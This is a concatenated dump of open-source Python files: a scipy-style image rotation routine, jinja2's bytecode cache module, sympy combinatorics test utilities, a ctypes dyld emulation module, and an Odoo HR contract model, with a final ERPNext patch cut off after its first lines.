angle = numpy.pi / 180 * angle
m11 = math.cos(angle)
m12 = math.sin(angle)
m21 = -math.sin(angle)
m22 = math.cos(angle)
matrix = numpy.array([[m11, m12],
[m21, m22]], dtype = numpy.float64)
iy = input.shape[axes[0]]
ix = input.shape[axes[1]]
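    # When reshape is requested, rotate the corners of the input plane to
    # find the bounding box that determines the output shape in the rotation
    # plane; otherwise the output keeps the input's shape.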
if reshape:
mtrx = numpy.array([[ m11, -m21],
[-m12, m22]], dtype = numpy.float64)
minc = [0, 0]
maxc = [0, 0]
coor = numpy.dot(mtrx, [0, ix])
minc, maxc = _minmax(coor, minc, maxc)
coor = numpy.dot(mtrx, [iy, 0])
minc, maxc = _minmax(coor, minc, maxc)
coor = numpy.dot(mtrx, [iy, ix])
minc, maxc = _minmax(coor, minc, maxc)
oy = int(maxc[0] - minc[0] + 0.5)
ox = int(maxc[1] - minc[1] + 0.5)
else:
oy = input.shape[axes[0]]
ox = input.shape[axes[1]]
offset = numpy.zeros((2,), dtype = numpy.float64)
offset[0] = float(oy) / 2.0 - 0.5
offset[1] = float(ox) / 2.0 - 0.5
offset = numpy.dot(matrix, offset)
tmp = numpy.zeros((2,), dtype = numpy.float64)
tmp[0] = float(iy) / 2.0 - 0.5
tmp[1] = float(ix) / 2.0 - 0.5
offset = tmp - offset
output_shape = list(input.shape)
output_shape[axes[0]] = oy
output_shape[axes[1]] = ox
output_shape = tuple(output_shape)
output, return_value = _ni_support._get_output(output, input,
shape=output_shape)
if input.ndim <= 2:
affine_transform(input, matrix, offset, output_shape, output,
order, mode, cval, prefilter)
else:
coordinates = []
size = numpy.product(input.shape,axis=0)
size //= input.shape[axes[0]]
size //= input.shape[axes[1]]
for ii in range(input.ndim):
if ii not in axes:
coordinates.append(0)
else:
coordinates.append(slice(None, None, None))
iter_axes = range(input.ndim)
iter_axes.reverse()
iter_axes.remove(axes[0])
iter_axes.remove(axes[1])
os = (output_shape[axes[0]], output_shape[axes[1]])
for ii in range(size):
ia = input[tuple(coordinates)]
oa = output[tuple(coordinates)]
affine_transform(ia, matrix, offset, os, oa, order, mode,
cval, prefilter)
for jj in iter_axes:
if coordinates[jj] < input.shape[jj] - 1:
coordinates[jj] += 1
break
else:
coordinates[jj] = 0
return return_value
| gpl-3.0 |
tmerrick1/spack | lib/spack/external/jinja2/bccache.py | 84 | 12794 | # -*- coding: utf-8 -*-
"""
jinja2.bccache
~~~~~~~~~~~~~~
This module implements the bytecode cache system Jinja is optionally
using. This is useful if you have very complex template situations and
the compiliation of all those templates slow down your application too
much.
Situations where this is useful are often forking web applications that
are initialized on the first request.
:copyright: (c) 2017 by the Jinja Team.
:license: BSD.
"""
from os import path, listdir
import os
import sys
import stat
import errno
import marshal
import tempfile
import fnmatch
from hashlib import sha1
from jinja2.utils import open_if_exists
from jinja2._compat import BytesIO, pickle, PY2, text_type
# marshal works better on 3.x, one hack less required
if not PY2:
marshal_dump = marshal.dump
marshal_load = marshal.load
else:
def marshal_dump(code, f):
if isinstance(f, file):
marshal.dump(code, f)
else:
f.write(marshal.dumps(code))
def marshal_load(f):
if isinstance(f, file):
return marshal.load(f)
return marshal.loads(f.read())
bc_version = 3
# magic version used to only change with new jinja versions. With 2.6
# we change this to also take Python version changes into account. The
# reason for this is that Python tends to segfault if fed earlier bytecode
# versions because someone thought it would be a good idea to reuse opcodes
# or make Python incompatible with earlier versions.
bc_magic = 'j2'.encode('ascii') + \
pickle.dumps(bc_version, 2) + \
pickle.dumps((sys.version_info[0] << 24) | sys.version_info[1])
class Bucket(object):
"""Buckets are used to store the bytecode for one template. It's created
and initialized by the bytecode cache and passed to the loading functions.
    The buckets get an internal checksum assigned by the cache and use this
to automatically reject outdated cache material. Individual bytecode
cache subclasses don't have to care about cache invalidation.
"""
def __init__(self, environment, key, checksum):
self.environment = environment
self.key = key
self.checksum = checksum
self.reset()
def reset(self):
"""Resets the bucket (unloads the bytecode)."""
self.code = None
def load_bytecode(self, f):
"""Loads bytecode from a file or file like object."""
# make sure the magic header is correct
magic = f.read(len(bc_magic))
if magic != bc_magic:
self.reset()
return
# the source code of the file changed, we need to reload
checksum = pickle.load(f)
if self.checksum != checksum:
self.reset()
return
# if marshal_load fails then we need to reload
try:
self.code = marshal_load(f)
except (EOFError, ValueError, TypeError):
self.reset()
return
def write_bytecode(self, f):
"""Dump the bytecode into the file or file like object passed."""
if self.code is None:
raise TypeError('can\'t write empty bucket')
f.write(bc_magic)
pickle.dump(self.checksum, f, 2)
marshal_dump(self.code, f)
def bytecode_from_string(self, string):
"""Load bytecode from a string."""
self.load_bytecode(BytesIO(string))
def bytecode_to_string(self):
"""Return the bytecode as string."""
out = BytesIO()
self.write_bytecode(out)
return out.getvalue()
class BytecodeCache(object):
"""To implement your own bytecode cache you have to subclass this class
and override :meth:`load_bytecode` and :meth:`dump_bytecode`. Both of
these methods are passed a :class:`~jinja2.bccache.Bucket`.
A very basic bytecode cache that saves the bytecode on the file system::
from os import path
class MyCache(BytecodeCache):
def __init__(self, directory):
self.directory = directory
def load_bytecode(self, bucket):
filename = path.join(self.directory, bucket.key)
if path.exists(filename):
with open(filename, 'rb') as f:
bucket.load_bytecode(f)
def dump_bytecode(self, bucket):
filename = path.join(self.directory, bucket.key)
with open(filename, 'wb') as f:
bucket.write_bytecode(f)
A more advanced version of a filesystem based bytecode cache is part of
Jinja2.
"""
def load_bytecode(self, bucket):
"""Subclasses have to override this method to load bytecode into a
bucket. If they are not able to find code in the cache for the
bucket, it must not do anything.
"""
raise NotImplementedError()
def dump_bytecode(self, bucket):
"""Subclasses have to override this method to write the bytecode
        from a bucket back to the cache. If it is unable to do so it must not
fail silently but raise an exception.
"""
raise NotImplementedError()
def clear(self):
"""Clears the cache. This method is not used by Jinja2 but should be
implemented to allow applications to clear the bytecode cache used
by a particular environment.
"""
def get_cache_key(self, name, filename=None):
"""Returns the unique hash key for this template name."""
hash = sha1(name.encode('utf-8'))
if filename is not None:
filename = '|' + filename
if isinstance(filename, text_type):
filename = filename.encode('utf-8')
hash.update(filename)
return hash.hexdigest()
def get_source_checksum(self, source):
"""Returns a checksum for the source."""
return sha1(source.encode('utf-8')).hexdigest()
def get_bucket(self, environment, name, filename, source):
"""Return a cache bucket for the given template. All arguments are
mandatory but filename may be `None`.
"""
key = self.get_cache_key(name, filename)
checksum = self.get_source_checksum(source)
bucket = Bucket(environment, key, checksum)
self.load_bytecode(bucket)
return bucket
def set_bucket(self, bucket):
"""Put the bucket into the cache."""
self.dump_bytecode(bucket)
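# Illustrative consumer-side sketch: how a caller would use get_bucket()
# and set_bucket() around compilation. This only mirrors, in simplified
# form, what an environment does when a bytecode cache is configured; the
# compile() call stands in for the real template compiler.
def _example_cache_lookup(cache, environment, name, filename, source):
    bucket = cache.get_bucket(environment, name, filename, source)
    if bucket.code is None:
        # Cache miss: compile the source and store the result.
        bucket.code = compile(source, filename or '<template>', 'exec')
        cache.set_bucket(bucket)
    return bucket.code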
class FileSystemBytecodeCache(BytecodeCache):
"""A bytecode cache that stores bytecode on the filesystem. It accepts
two arguments: The directory where the cache items are stored and a
pattern string that is used to build the filename.
If no directory is specified a default cache directory is selected. On
Windows the user's temp directory is used, on UNIX systems a directory
is created for the user in the system temp directory.
The pattern can be used to have multiple separate caches operate on the
same directory. The default pattern is ``'__jinja2_%s.cache'``. ``%s``
is replaced with the cache key.
>>> bcc = FileSystemBytecodeCache('/tmp/jinja_cache', '%s.cache')
This bytecode cache supports clearing of the cache using the clear method.
"""
def __init__(self, directory=None, pattern='__jinja2_%s.cache'):
if directory is None:
directory = self._get_default_cache_dir()
self.directory = directory
self.pattern = pattern
def _get_default_cache_dir(self):
def _unsafe_dir():
raise RuntimeError('Cannot determine safe temp directory. You '
'need to explicitly provide one.')
tmpdir = tempfile.gettempdir()
        # On Windows the temporary directory is already per-user unless
        # explicitly forced otherwise, so we can just use it.
if os.name == 'nt':
return tmpdir
if not hasattr(os, 'getuid'):
_unsafe_dir()
dirname = '_jinja2-cache-%d' % os.getuid()
actual_dir = os.path.join(tmpdir, dirname)
try:
os.mkdir(actual_dir, stat.S_IRWXU)
except OSError as e:
if e.errno != errno.EEXIST:
raise
try:
os.chmod(actual_dir, stat.S_IRWXU)
actual_dir_stat = os.lstat(actual_dir)
if actual_dir_stat.st_uid != os.getuid() \
or not stat.S_ISDIR(actual_dir_stat.st_mode) \
or stat.S_IMODE(actual_dir_stat.st_mode) != stat.S_IRWXU:
_unsafe_dir()
except OSError as e:
if e.errno != errno.EEXIST:
raise
actual_dir_stat = os.lstat(actual_dir)
if actual_dir_stat.st_uid != os.getuid() \
or not stat.S_ISDIR(actual_dir_stat.st_mode) \
or stat.S_IMODE(actual_dir_stat.st_mode) != stat.S_IRWXU:
_unsafe_dir()
return actual_dir
def _get_cache_filename(self, bucket):
return path.join(self.directory, self.pattern % bucket.key)
def load_bytecode(self, bucket):
f = open_if_exists(self._get_cache_filename(bucket), 'rb')
if f is not None:
try:
bucket.load_bytecode(f)
finally:
f.close()
def dump_bytecode(self, bucket):
f = open(self._get_cache_filename(bucket), 'wb')
try:
bucket.write_bytecode(f)
finally:
f.close()
def clear(self):
# imported lazily here because google app-engine doesn't support
# write access on the file system and the function does not exist
# normally.
from os import remove
files = fnmatch.filter(listdir(self.directory), self.pattern % '*')
for filename in files:
try:
remove(path.join(self.directory, filename))
except OSError:
pass
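# Illustrative usage sketch: wiring this cache into an Environment via the
# ``bytecode_cache`` argument. The cache directory and the inline template
# are arbitrary example values.
def _example_filesystem_cache():
    from jinja2 import Environment, DictLoader
    env = Environment(
        loader=DictLoader({'hello.txt': 'Hello {{ name }}!'}),
        bytecode_cache=FileSystemBytecodeCache('/tmp/jinja_cache'),
    )
    # The first render compiles and caches; later processes reuse the cache.
    return env.get_template('hello.txt').render(name='World')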
class MemcachedBytecodeCache(BytecodeCache):
"""This class implements a bytecode cache that uses a memcache cache for
storing the information. It does not enforce a specific memcache library
(tummy's memcache or cmemcache) but will accept any class that provides
the minimal interface required.
Libraries compatible with this class:
- `werkzeug <http://werkzeug.pocoo.org/>`_.contrib.cache
- `python-memcached <https://www.tummy.com/Community/software/python-memcached/>`_
- `cmemcache <http://gijsbert.org/cmemcache/>`_
(Unfortunately the django cache interface is not compatible because it
does not support storing binary data, only unicode. You can however pass
the underlying cache client to the bytecode cache which is available
as `django.core.cache.cache._client`.)
The minimal interface for the client passed to the constructor is this:
.. class:: MinimalClientInterface
.. method:: set(key, value[, timeout])
Stores the bytecode in the cache. `value` is a string and
`timeout` the timeout of the key. If timeout is not provided
            a default timeout or no timeout should be assumed; if it is
            provided, it is an integer with the number of seconds the cache
            item should exist.
.. method:: get(key)
Returns the value for the cache key. If the item does not
exist in the cache the return value must be `None`.
The other arguments to the constructor are the prefix for all keys that
is added before the actual cache key and the timeout for the bytecode in
the cache system. We recommend a high (or no) timeout.
This bytecode cache does not support clearing of used items in the cache.
The clear method is a no-operation function.
.. versionadded:: 2.7
Added support for ignoring memcache errors through the
`ignore_memcache_errors` parameter.
"""
def __init__(self, client, prefix='jinja2/bytecode/', timeout=None,
ignore_memcache_errors=True):
self.client = client
self.prefix = prefix
self.timeout = timeout
self.ignore_memcache_errors = ignore_memcache_errors
def load_bytecode(self, bucket):
try:
code = self.client.get(self.prefix + bucket.key)
except Exception:
if not self.ignore_memcache_errors:
raise
code = None
if code is not None:
bucket.bytecode_from_string(code)
def dump_bytecode(self, bucket):
args = (self.prefix + bucket.key, bucket.bytecode_to_string())
if self.timeout is not None:
args += (self.timeout,)
try:
self.client.set(*args)
except Exception:
if not self.ignore_memcache_errors:
raise
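# Illustrative usage sketch: using the python-memcached client with this
# cache. The server address, prefix and timeout are arbitrary example
# values; any client exposing compatible get()/set() methods should work
# as well.
def _example_memcached_cache():
    import memcache
    client = memcache.Client(['127.0.0.1:11211'])
    return MemcachedBytecodeCache(client, prefix='jinja2/bytecode/',
                                  timeout=60 * 60 * 24)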
| lgpl-2.1 |
jaimahajan1997/sympy | sympy/combinatorics/testutil.py | 33 | 11004 | from __future__ import print_function, division
from sympy.core.compatibility import range
from sympy.combinatorics.util import _distribute_gens_by_base
from sympy.combinatorics import Permutation
rmul = Permutation.rmul
def _cmp_perm_lists(first, second):
"""
Compare two lists of permutations as sets.
This is used for testing purposes. Since the array form of a
permutation is currently a list, Permutation is not hashable
and cannot be put into a set.
Examples
========
>>> from sympy.combinatorics.permutations import Permutation
>>> from sympy.combinatorics.testutil import _cmp_perm_lists
>>> a = Permutation([0, 2, 3, 4, 1])
>>> b = Permutation([1, 2, 0, 4, 3])
>>> c = Permutation([3, 4, 0, 1, 2])
>>> ls1 = [a, b, c]
>>> ls2 = [b, c, a]
>>> _cmp_perm_lists(ls1, ls2)
True
"""
return {tuple(a) for a in first} == \
{tuple(a) for a in second}
def _naive_list_centralizer(self, other, af=False):
from sympy.combinatorics.perm_groups import PermutationGroup
"""
Return a list of elements for the centralizer of a subgroup/set/element.
This is a brute force implementation that goes over all elements of the
group and checks for membership in the centralizer. It is used to
test ``.centralizer()`` from ``sympy.combinatorics.perm_groups``.
Examples
========
>>> from sympy.combinatorics.testutil import _naive_list_centralizer
>>> from sympy.combinatorics.named_groups import DihedralGroup
>>> D = DihedralGroup(4)
>>> _naive_list_centralizer(D, D)
[Permutation([0, 1, 2, 3]), Permutation([2, 3, 0, 1])]
See Also
========
sympy.combinatorics.perm_groups.centralizer
"""
from sympy.combinatorics.permutations import _af_commutes_with
if hasattr(other, 'generators'):
elements = list(self.generate_dimino(af=True))
gens = [x._array_form for x in other.generators]
commutes_with_gens = lambda x: all(_af_commutes_with(x, gen) for gen in gens)
centralizer_list = []
if not af:
for element in elements:
if commutes_with_gens(element):
centralizer_list.append(Permutation._af_new(element))
else:
for element in elements:
if commutes_with_gens(element):
centralizer_list.append(element)
return centralizer_list
elif hasattr(other, 'getitem'):
return _naive_list_centralizer(self, PermutationGroup(other), af)
elif hasattr(other, 'array_form'):
return _naive_list_centralizer(self, PermutationGroup([other]), af)
def _verify_bsgs(group, base, gens):
"""
Verify the correctness of a base and strong generating set.
This is a naive implementation using the definition of a base and a strong
generating set relative to it. There are other procedures for
verifying a base and strong generating set, but this one will
serve for more robust testing.
Examples
========
>>> from sympy.combinatorics.named_groups import AlternatingGroup
>>> from sympy.combinatorics.testutil import _verify_bsgs
>>> A = AlternatingGroup(4)
>>> A.schreier_sims()
>>> _verify_bsgs(A, A.base, A.strong_gens)
True
See Also
========
sympy.combinatorics.perm_groups.PermutationGroup.schreier_sims
"""
from sympy.combinatorics.perm_groups import PermutationGroup
strong_gens_distr = _distribute_gens_by_base(base, gens)
current_stabilizer = group
for i in range(len(base)):
candidate = PermutationGroup(strong_gens_distr[i])
if current_stabilizer.order() != candidate.order():
return False
current_stabilizer = current_stabilizer.stabilizer(base[i])
if current_stabilizer.order() != 1:
return False
return True
def _verify_centralizer(group, arg, centr=None):
"""
Verify the centralizer of a group/set/element inside another group.
This is used for testing ``.centralizer()`` from
``sympy.combinatorics.perm_groups``
Examples
========
>>> from sympy.combinatorics.named_groups import (SymmetricGroup,
... AlternatingGroup)
>>> from sympy.combinatorics.perm_groups import PermutationGroup
>>> from sympy.combinatorics.permutations import Permutation
>>> from sympy.combinatorics.testutil import _verify_centralizer
>>> S = SymmetricGroup(5)
>>> A = AlternatingGroup(5)
>>> centr = PermutationGroup([Permutation([0, 1, 2, 3, 4])])
>>> _verify_centralizer(S, A, centr)
True
See Also
========
_naive_list_centralizer,
sympy.combinatorics.perm_groups.PermutationGroup.centralizer,
_cmp_perm_lists
"""
if centr is None:
centr = group.centralizer(arg)
centr_list = list(centr.generate_dimino(af=True))
centr_list_naive = _naive_list_centralizer(group, arg, af=True)
return _cmp_perm_lists(centr_list, centr_list_naive)
def _verify_normal_closure(group, arg, closure=None):
from sympy.combinatorics.perm_groups import PermutationGroup
"""
Verify the normal closure of a subgroup/subset/element in a group.
This is used to test
sympy.combinatorics.perm_groups.PermutationGroup.normal_closure
Examples
========
>>> from sympy.combinatorics.named_groups import (SymmetricGroup,
... AlternatingGroup)
>>> from sympy.combinatorics.testutil import _verify_normal_closure
>>> S = SymmetricGroup(3)
>>> A = AlternatingGroup(3)
>>> _verify_normal_closure(S, A, closure=A)
True
See Also
========
sympy.combinatorics.perm_groups.PermutationGroup.normal_closure
"""
if closure is None:
closure = group.normal_closure(arg)
conjugates = set()
if hasattr(arg, 'generators'):
subgr_gens = arg.generators
elif hasattr(arg, '__getitem__'):
subgr_gens = arg
elif hasattr(arg, 'array_form'):
subgr_gens = [arg]
for el in group.generate_dimino():
for gen in subgr_gens:
conjugates.add(gen ^ el)
naive_closure = PermutationGroup(list(conjugates))
return closure.is_subgroup(naive_closure)
def canonicalize_naive(g, dummies, sym, *v):
"""
Canonicalize tensor formed by tensors of the different types
g permutation representing the tensor
dummies list of dummy indices
    sym symmetry of the metric
v is a list of (base_i, gens_i, n_i, sym_i) for tensors of type `i`
base_i, gens_i BSGS for tensors of this type
    n_i number of tensors of type `i`
sym_i symmetry under exchange of two component tensors of type `i`
None no symmetry
0 commuting
1 anticommuting
Return 0 if the tensor is zero, else return the array form of
the permutation representing the canonical form of the tensor.
Examples
========
>>> from sympy.combinatorics.testutil import canonicalize_naive
>>> from sympy.combinatorics.tensor_can import get_symmetric_group_sgs
>>> from sympy.combinatorics import Permutation, PermutationGroup
>>> g = Permutation([1, 3, 2, 0, 4, 5])
>>> base2, gens2 = get_symmetric_group_sgs(2)
>>> canonicalize_naive(g, [2, 3], 0, (base2, gens2, 2, 0))
[0, 2, 1, 3, 4, 5]
"""
from sympy.combinatorics.perm_groups import PermutationGroup
from sympy.combinatorics.tensor_can import gens_products, dummy_sgs
from sympy.combinatorics.permutations import Permutation, _af_rmul
v1 = []
for i in range(len(v)):
base_i, gens_i, n_i, sym_i = v[i]
v1.append((base_i, gens_i, [[]]*n_i, sym_i))
size, sbase, sgens = gens_products(*v1)
dgens = dummy_sgs(dummies, sym, size-2)
if isinstance(sym, int):
num_types = 1
dummies = [dummies]
sym = [sym]
else:
num_types = len(sym)
dgens = []
for i in range(num_types):
dgens.extend(dummy_sgs(dummies[i], sym[i], size - 2))
S = PermutationGroup(sgens)
D = PermutationGroup([Permutation(x) for x in dgens])
dlist = list(D.generate(af=True))
g = g.array_form
st = set()
for s in S.generate(af=True):
h = _af_rmul(g, s)
for d in dlist:
q = tuple(_af_rmul(d, h))
st.add(q)
a = list(st)
a.sort()
prev = (0,)*size
for h in a:
if h[:-2] == prev[:-2]:
if h[-1] != prev[-1]:
return 0
prev = h
return list(a[0])
def graph_certificate(gr):
"""
Return a certificate for the graph
gr adjacency list
The graph is assumed to be unoriented and without
external lines.
Associate to each vertex of the graph a symmetric tensor with
number of indices equal to the degree of the vertex; indices
are contracted when they correspond to the same line of the graph.
The canonical form of the tensor gives a certificate for the graph.
This is not an efficient algorithm to get the certificate of a graph.
Examples
========
>>> from sympy.combinatorics.testutil import graph_certificate
>>> gr1 = {0:[1, 2, 3, 5], 1:[0, 2, 4], 2:[0, 1, 3, 4], 3:[0, 2, 4], 4:[1, 2, 3, 5], 5:[0, 4]}
>>> gr2 = {0:[1, 5], 1:[0, 2, 3, 4], 2:[1, 3, 5], 3:[1, 2, 4, 5], 4:[1, 3, 5], 5:[0, 2, 3, 4]}
>>> c1 = graph_certificate(gr1)
>>> c2 = graph_certificate(gr2)
>>> c1
[0, 2, 4, 6, 1, 8, 10, 12, 3, 14, 16, 18, 5, 9, 15, 7, 11, 17, 13, 19, 20, 21]
>>> c1 == c2
True
"""
from sympy.combinatorics.permutations import _af_invert
from sympy.combinatorics.tensor_can import get_symmetric_group_sgs, canonicalize
items = list(gr.items())
items.sort(key=lambda x: len(x[1]), reverse=True)
pvert = [x[0] for x in items]
pvert = _af_invert(pvert)
# the indices of the tensor are twice the number of lines of the graph
num_indices = 0
for v, neigh in items:
num_indices += len(neigh)
# associate to each vertex its indices; for each line
# between two vertices assign the
# even index to the vertex which comes first in items,
# the odd index to the other vertex
vertices = [[] for i in items]
i = 0
for v, neigh in items:
for v2 in neigh:
if pvert[v] < pvert[v2]:
vertices[pvert[v]].append(i)
vertices[pvert[v2]].append(i+1)
i += 2
g = []
for v in vertices:
g.extend(v)
assert len(g) == num_indices
g += [num_indices, num_indices + 1]
size = num_indices + 2
assert sorted(g) == list(range(size))
g = Permutation(g)
vlen = [0]*(len(vertices[0])+1)
for neigh in vertices:
vlen[len(neigh)] += 1
v = []
for i in range(len(vlen)):
n = vlen[i]
if n:
base, gens = get_symmetric_group_sgs(i)
v.append((base, gens, n, 0))
v.reverse()
dummies = list(range(num_indices))
can = canonicalize(g, dummies, 0, *v)
return can
| bsd-3-clause |
hynnet/openwrt-mt7620 | staging_dir/target-mipsel_r2_uClibc-0.9.33.2/usr/lib/python2.7/ctypes/macholib/dyld.py | 253 | 5341 | ######################################################################
# This file should be kept compatible with Python 2.3, see PEP 291. #
######################################################################
"""
dyld emulation
"""
import os
from framework import framework_info
from dylib import dylib_info
from itertools import *
__all__ = [
'dyld_find', 'framework_find',
'framework_info', 'dylib_info',
]
# These are the defaults as per man dyld(1)
#
DEFAULT_FRAMEWORK_FALLBACK = [
os.path.expanduser("~/Library/Frameworks"),
"/Library/Frameworks",
"/Network/Library/Frameworks",
"/System/Library/Frameworks",
]
DEFAULT_LIBRARY_FALLBACK = [
os.path.expanduser("~/lib"),
"/usr/local/lib",
"/lib",
"/usr/lib",
]
def ensure_utf8(s):
"""Not all of PyObjC and Python understand unicode paths very well yet"""
if isinstance(s, unicode):
return s.encode('utf8')
return s
def dyld_env(env, var):
if env is None:
env = os.environ
rval = env.get(var)
if rval is None:
return []
return rval.split(':')
def dyld_image_suffix(env=None):
if env is None:
env = os.environ
return env.get('DYLD_IMAGE_SUFFIX')
def dyld_framework_path(env=None):
return dyld_env(env, 'DYLD_FRAMEWORK_PATH')
def dyld_library_path(env=None):
return dyld_env(env, 'DYLD_LIBRARY_PATH')
def dyld_fallback_framework_path(env=None):
return dyld_env(env, 'DYLD_FALLBACK_FRAMEWORK_PATH')
def dyld_fallback_library_path(env=None):
return dyld_env(env, 'DYLD_FALLBACK_LIBRARY_PATH')
def dyld_image_suffix_search(iterator, env=None):
"""For a potential path iterator, add DYLD_IMAGE_SUFFIX semantics"""
suffix = dyld_image_suffix(env)
if suffix is None:
return iterator
def _inject(iterator=iterator, suffix=suffix):
for path in iterator:
if path.endswith('.dylib'):
yield path[:-len('.dylib')] + suffix + '.dylib'
else:
yield path + suffix
yield path
return _inject()
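# Illustrative sketch: with DYLD_IMAGE_SUFFIX set to '_debug', each
# candidate dylib path is yielded with the suffix spliced in before
# '.dylib', followed by the plain path. The env dict and path are example
# values.
def _example_image_suffix_search():
    env = {'DYLD_IMAGE_SUFFIX': '_debug'}
    candidates = dyld_image_suffix_search(iter(['/usr/lib/libSystem.dylib']), env)
    # Expected: ['/usr/lib/libSystem_debug.dylib', '/usr/lib/libSystem.dylib']
    return list(candidates)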
def dyld_override_search(name, env=None):
# If DYLD_FRAMEWORK_PATH is set and this dylib_name is a
# framework name, use the first file that exists in the framework
# path if any. If there is none go on to search the DYLD_LIBRARY_PATH
# if any.
framework = framework_info(name)
if framework is not None:
for path in dyld_framework_path(env):
yield os.path.join(path, framework['name'])
# If DYLD_LIBRARY_PATH is set then use the first file that exists
# in the path. If none use the original name.
for path in dyld_library_path(env):
yield os.path.join(path, os.path.basename(name))
def dyld_executable_path_search(name, executable_path=None):
# If we haven't done any searching and found a library and the
# dylib_name starts with "@executable_path/" then construct the
# library name.
if name.startswith('@executable_path/') and executable_path is not None:
yield os.path.join(executable_path, name[len('@executable_path/'):])
def dyld_default_search(name, env=None):
yield name
framework = framework_info(name)
if framework is not None:
fallback_framework_path = dyld_fallback_framework_path(env)
for path in fallback_framework_path:
yield os.path.join(path, framework['name'])
fallback_library_path = dyld_fallback_library_path(env)
for path in fallback_library_path:
yield os.path.join(path, os.path.basename(name))
if framework is not None and not fallback_framework_path:
for path in DEFAULT_FRAMEWORK_FALLBACK:
yield os.path.join(path, framework['name'])
if not fallback_library_path:
for path in DEFAULT_LIBRARY_FALLBACK:
yield os.path.join(path, os.path.basename(name))
def dyld_find(name, executable_path=None, env=None):
"""
Find a library or framework using dyld semantics
"""
name = ensure_utf8(name)
executable_path = ensure_utf8(executable_path)
for path in dyld_image_suffix_search(chain(
dyld_override_search(name, env),
dyld_executable_path_search(name, executable_path),
dyld_default_search(name, env),
), env):
if os.path.isfile(path):
return path
raise ValueError("dylib %s could not be found" % (name,))
def framework_find(fn, executable_path=None, env=None):
"""
Find a framework using dyld semantics in a very loose manner.
Will take input such as:
Python
Python.framework
Python.framework/Versions/Current
"""
try:
return dyld_find(fn, executable_path=executable_path, env=env)
except ValueError, e:
pass
fmwk_index = fn.rfind('.framework')
if fmwk_index == -1:
fmwk_index = len(fn)
fn += '.framework'
fn = os.path.join(fn, os.path.basename(fn[:fmwk_index]))
try:
return dyld_find(fn, executable_path=executable_path, env=env)
except ValueError:
raise e
def test_dyld_find():
env = {}
assert dyld_find('libSystem.dylib') == '/usr/lib/libSystem.dylib'
assert dyld_find('System.framework/System') == '/System/Library/Frameworks/System.framework/System'
if __name__ == '__main__':
test_dyld_find()
| gpl-2.0 |
web30s/odoo-9.0c-20160402 | hello/templates/openerp/addons/hr_contract/hr_contract.py | 44 | 5741 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import time
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
class hr_employee(osv.osv):
_name = "hr.employee"
_description = "Employee"
_inherit = "hr.employee"
def _get_latest_contract(self, cr, uid, ids, field_name, args, context=None):
res = {}
obj_contract = self.pool.get('hr.contract')
for emp in self.browse(cr, uid, ids, context=context):
contract_ids = obj_contract.search(cr, uid, [('employee_id', '=', emp.id)], order='date_start', context=context)
if contract_ids:
res[emp.id] = contract_ids[-1:][0]
else:
res[emp.id] = False
return res
def _contracts_count(self, cr, uid, ids, field_name, arg, context=None):
Contract = self.pool['hr.contract']
return {
employee_id: Contract.search_count(cr, SUPERUSER_ID, [('employee_id', '=', employee_id)], context=context)
for employee_id in ids
}
_columns = {
'manager': fields.boolean('Is a Manager'),
'medic_exam': fields.date('Medical Examination Date'),
'place_of_birth': fields.char('Place of Birth'),
'children': fields.integer('Number of Children'),
'vehicle': fields.char('Company Vehicle'),
'vehicle_distance': fields.integer('Home-Work Dist.', help="In kilometers"),
'contract_ids': fields.one2many('hr.contract', 'employee_id', 'Contracts'),
'contract_id': fields.function(_get_latest_contract, string='Current Contract', type='many2one', relation="hr.contract", help='Latest contract of the employee'),
'contracts_count': fields.function(_contracts_count, type='integer', string='Contracts'),
}
class hr_contract_type(osv.osv):
_name = 'hr.contract.type'
_description = 'Contract Type'
_order = 'sequence, id'
_columns = {
'name': fields.char('Contract Type', required=True),
'sequence': fields.integer('Sequence', help="Gives the sequence when displaying a list of Contract."),
}
    _defaults = {
'sequence': 10
}
class hr_contract(osv.osv):
_name = 'hr.contract'
_description = 'Contract'
_inherit = ['mail.thread', 'ir.needaction_mixin']
_columns = {
'name': fields.char('Contract Reference', required=True),
'employee_id': fields.many2one('hr.employee', "Employee", required=True),
'department_id': fields.many2one('hr.department', string="Department"),
'type_id': fields.many2one('hr.contract.type', "Contract Type", required=True),
'job_id': fields.many2one('hr.job', 'Job Title'),
'date_start': fields.date('Start Date', required=True),
'date_end': fields.date('End Date'),
'trial_date_start': fields.date('Trial Start Date'),
'trial_date_end': fields.date('Trial End Date'),
'working_hours': fields.many2one('resource.calendar', 'Working Schedule'),
'wage': fields.float('Wage', digits=(16, 2), required=True, help="Basic Salary of the employee"),
'advantages': fields.text('Advantages'),
'notes': fields.text('Notes'),
'permit_no': fields.char('Work Permit No', required=False, readonly=False),
'visa_no': fields.char('Visa No', required=False, readonly=False),
'visa_expire': fields.date('Visa Expire Date'),
'state': fields.selection(
[('draft', 'New'), ('open', 'Running'), ('pending', 'To Renew'), ('close', 'Expired')],
string='Status', track_visibility='onchange',
help='Status of the contract'),
}
def _get_type(self, cr, uid, context=None):
type_ids = self.pool.get('hr.contract.type').search(cr, uid, [], limit=1)
return type_ids and type_ids[0] or False
_defaults = {
'date_start': lambda *a: time.strftime("%Y-%m-%d"),
'type_id': _get_type,
'state': 'draft',
}
def onchange_employee_id(self, cr, uid, ids, employee_id, context=None):
if not employee_id:
return {'value': {'job_id': False, 'department_id': False}}
emp_obj = self.pool.get('hr.employee').browse(cr, uid, employee_id, context=context)
job_id = dept_id = False
if emp_obj.job_id:
job_id = emp_obj.job_id.id
if emp_obj.department_id:
dept_id = emp_obj.department_id.id
return {'value': {'job_id': job_id, 'department_id': dept_id}}
def _check_dates(self, cr, uid, ids, context=None):
for contract in self.read(cr, uid, ids, ['date_start', 'date_end'], context=context):
if contract['date_start'] and contract['date_end'] and contract['date_start'] > contract['date_end']:
return False
return True
_constraints = [
(_check_dates, 'Error! Contract start-date must be less than contract end-date.', ['date_start', 'date_end'])
]
def set_as_pending(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'pending'}, context=context)
def set_as_close(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'close'}, context=context)
def _track_subtype(self, cr, uid, ids, init_values, context=None):
record = self.browse(cr, uid, ids[0], context=context)
if 'state' in init_values and record.state == 'pending':
return 'hr_contract.mt_contract_pending'
elif 'state' in init_values and record.state == 'close':
return 'hr_contract.mt_contract_close'
return super(hr_contract, self)._track_subtype(cr, uid, ids, init_values, context=context)
| gpl-3.0 |
mhbu50/erpnext | erpnext/patches/v12_0/rename_lost_reason_detail.py | 3 | 1325 | from __future__ import unicode_literals
import frappe
def execute():
